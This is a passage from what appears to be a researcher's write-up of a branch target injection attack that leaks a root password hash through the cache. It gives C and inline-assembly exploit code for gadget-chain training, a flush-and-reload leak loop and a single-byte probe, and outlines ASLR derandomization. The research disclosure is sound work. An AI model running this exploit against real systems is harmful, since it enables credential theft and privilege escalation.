for (int i = 0; i < BHB_B_LEN; ++i) {
bbstack[i] = F(bhb_path_b[i].start_adr - off);
}
void finland();
bbstack[BHB_B_LEN] = (long)finland;
bbstack[0] = F(bhb_path_b[0].start_adr - off);
asm("mov %%rsp, %%r15 \n"
"lea 8(%0), %%rsp \n"
"jmp *(%0) \n"
"finland: \n" /* come back here */
"mov %%r15, %%rsp \n" ::"r"(bbstack)
: "r15", "rax", "memory");
}
To trigger the victim, we send it a byte whose value is the offset of the secret byte we want to leak.
static struct timespec req = {0, 0};
int runsu_poke(child_proc_t *child, char c) {
    int ret = write(child->input, &c, 1);
    clock_nanosleep(CLOCK_REALTIME, 0, &req, NULL);
    return ret;
}
The condensed procedure becomes something similar to:
static const u64 rb_start = (u64)read + 18; /* rcx in victim points to read<+18> */
for (int sec_idx = 1; sec_idx < 110; ++sec_idx) {
int guess = -1;
while (guess == -1) {
train_gadgetchain(off);
flush_range(rb_start, RB_STRIDE, RB_SLOTS);
runsu_poke(runsu, sec_idx-1);
reload_range(rb_start, RB_STRIDE, RB_SLOTS, results);
for (int i = 1; i < RB_SLOTS; ++i) {
if (results[i] > 1) {
guess = i;
break;
}
}
}
secret[sec_idx] = guess;
}
Does this work? Not at all! First of all, we have to win a race condition: we need enough time to execute the entire gadget chain before the real return target comes back from the program stack. I was stuck at this point for an awfully long time. I attempted evicting the program stack from a sibling thread, but it didn't work. I attempted to prefetch the code of the respective gadgets by targeting preceding returns, which also did not work. Because the shl gadget is not strictly necessary, I removed it.
Because the results were extremely noisy, rather than flushing and reloading an entire range, I tried to flush and reload only a single entry, matching the 'o' of 'root' in the password hash; see the sketch below. If any of the tweaking worked, it should be able to detect this byte.
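With the shl gadget dropped, the chain touches rcx + (s << 8), so one byte value maps to one cache line. A sketch of probing only the 'o' slot, reusing the helpers from earlier (idx_of_o, the offset of an 'o' in the hash, is an assumption here):
u64 hit[1] = {0};
u64 slot_o = rb_start + ((u64)'o' << 8);
train_gadgetchain(off);
flush_range(slot_o, RB_STRIDE, 1);        /* flush just this one line */
runsu_poke(runsu, idx_of_o);              /* victim touches rcx + (hash[idx_of_o] << 8) */
reload_range(slot_o, RB_STRIDE, 1, hit);  /* hit[0] increments iff it really was 'o' */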
To slow down the victim, I introduced random memory noise alongside it by simply running the old stress-testing tool stress -m 1. I would occasionally see what appeared to be signal from the 'o' this way. However, the results were still noisy. It appeared that certain instances of the victim process were noisier than others, and those instances wouldn't be able to leak anything. So I would test whether each victim instance was able to leak 'o' before using it. This way, I was able to leak information -- however, at an incredibly low speed! But that is a different problem; we only wanted to conclude that it works!
Behold: https://www.youtube.com/watch?v=VYEVcj-vnbs
What about ASLR?
I skipped this for brevity. However, we do derandomize ASLR, and incredibly efficiently too! We derandomize the lower 32 bits of the address space, which is sufficient: we only need the lower 24 bits to hijack a particular branch, and only the lower 32 bits are recorded in the BTB prediction anyway. To derandomize, we use a "reversed" branch target injection attack, in the sense that we let the victim train a branch in the attacker process. The attacker then guesses around until it finds a branch that gets predicted with a prediction from the victim, thereby learning about its address space layout. For details on the ASLR exploit, I refer you to the paper.